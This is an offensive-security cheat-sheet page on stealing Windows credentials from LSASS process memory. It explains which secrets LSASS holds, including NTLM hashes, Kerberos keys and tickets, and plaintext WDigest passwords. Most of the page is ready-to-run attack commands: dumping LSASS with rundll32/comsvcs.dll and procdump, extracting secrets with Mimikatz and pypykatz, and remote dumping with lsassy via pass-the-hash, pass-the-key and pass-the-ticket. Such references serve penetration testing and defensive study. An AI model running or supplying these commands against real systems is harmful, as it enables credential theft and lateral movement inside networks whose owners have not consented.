πŸ’₯Cyb3rBook

LSASS

4 min read

PRIMARY CATEGORY β†’ WINDOWS CREDENTIALS DUMPING

LSASS (Process Memory)

LSASS β†’ Local Security Authority Subsystem Service

Critical Service and System Process that plays a central role in Credential Management and the Authentication Process in all Windows OS

Zoom In

This system process logically organises its memory space according to the various Active Sessions, each identified by a LUID

Authentication Packages
MSV

MSV1_0.dll

Windows Authentication Package that LSASS.exe calls on to validate logon attempts against the SAM database

Kerberos

Kerberos.dll

Network Authentication Protocol used by AD DS in Windows Domain Enviroments

After the authentication, users are granted with Tickets such as TGTs and TGSs

LSASS.exe caches the following information related to Kerberos β†’

  • Passwords
  • Ekeys (Kerberos Keys)
  • Tickets (TGT and TGS)
  • PINS associated with Kerberos
WDIGEST

WDIGEST.dll

Older Authentication Protocol enabled by default until Windows 8 and Windows Server 2012

The credentials cached by LSASS.exe related to WDIGEST are in plain text

Note that modern Windows Systems have WDIGEST disable by default

Sensitive Information Stored

Lsass.exe stores sensitive information in its memory space such as β†’

Passwords and Hashes

NTLM Hashes

LM Hashes

Plain Passwords β†’ If WDIGEST enabled or RDP Logon Credentials

PINs or Smartcard Credentials

Kerberos Keys

RC4_HMAC (NTLM Hash)

AES128 and AES256

DES_CBC_MD5

Kerberos Session Keys (ENC_PART in AS_REP | TGS_REP) related to valid TGTs and TGSs

Kerberos Tickets

TGTs (Tickets Granting Tickets)

TGSs (Tickets Grantins Services)

PAC (Privilege Attribute Certificate)

DPAPI

Credential Manager’s Stored Credentials

Remote Desktop Connections

Domain Cached Credentials

Browsers such as Google Chrome or Internet Explorer

Desktop Mail Clients like Outlook

Access Tokens

Certificates and Keys

Certificates stored in memory

Private Keys

NTLMv2 Keys

Exfiltration

Memory Dump

Minidump

Task Manager

Windows Native

Applied to Windows OS Versions lower than 8.1 due to LSA Protection executing LSASS.exe as PPL

Zoom In

A file called lsass.DMP is created and saved in

C:\Users\<USERNAME>\Appdata\Local\Temp
Rundll32.exe + Comsvcs.dll

Windows Native

Rundll32.exe

Applied to Windows OS Versions lower than 8.1 due to LSA Protection executing LSASS.exe as PPL

rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump $(Get-Process lsass).Id C:\lsass.dmp full
Procdump.exe

Procdump.exe

Applied to Windows OS Versions lower than 8.1 due to LSA Protection executing LSASS.exe as PPL

procdump.exe -ma lsass.exe C:\lsass.dmp

Secrets Dump - Offline

Mimikatz

Mimikatz.exe

From a Memory Dump

Minidump

The sekurlsa::minidump method from Mimikatz.exe is used to extract sensitive information from a Minidump created as mentioned here

sekurlsa::minidump <DUMP>
sekurlsa::logonpasswords
Pypykatz

Pypykatz

Setup
python3 -m venv .venv
. !$/bin/activate && pip3 install pypykatz
From a Memory Dump

Minidump

pypykatz lsa minidump <DUMP_FILE>

Secrets Dump - Live Host

Mimikatz

Mimikatz.exe

Most of the Sensitive Data
mimikatz.exe 'privilege::debug' 'token::elevate' 'sekurlsa::logonpasswords' exit
Kerberos EKeys
mimikatz.exe 'privilege::debug' 'token::elevate' 'kerberos::ekeys' exit

Secrets Dump - Remote

Lsassy

Lsassy

Plain Password
lsassy --username '<USER>' --password '<PASSWD>' --domain '<DOMAIN>' <TARGET[s]>
Pass the Hash

PtH

lsassy --username '<USER>' --hashes '<NT>' <TARGET[s]>
Pass the Key

PtK

lsassy --username '<USER>' -aesKey '<KEY>' <TARGET[s]>
Pass the Ticket

PtT

export KRB5CCNAME=<CCACHE>
lsassy --username '<USER>' --kerberos <TARGET[s]>

Resources

Remote LSASS Dump Passwords

Graph View

Backlinks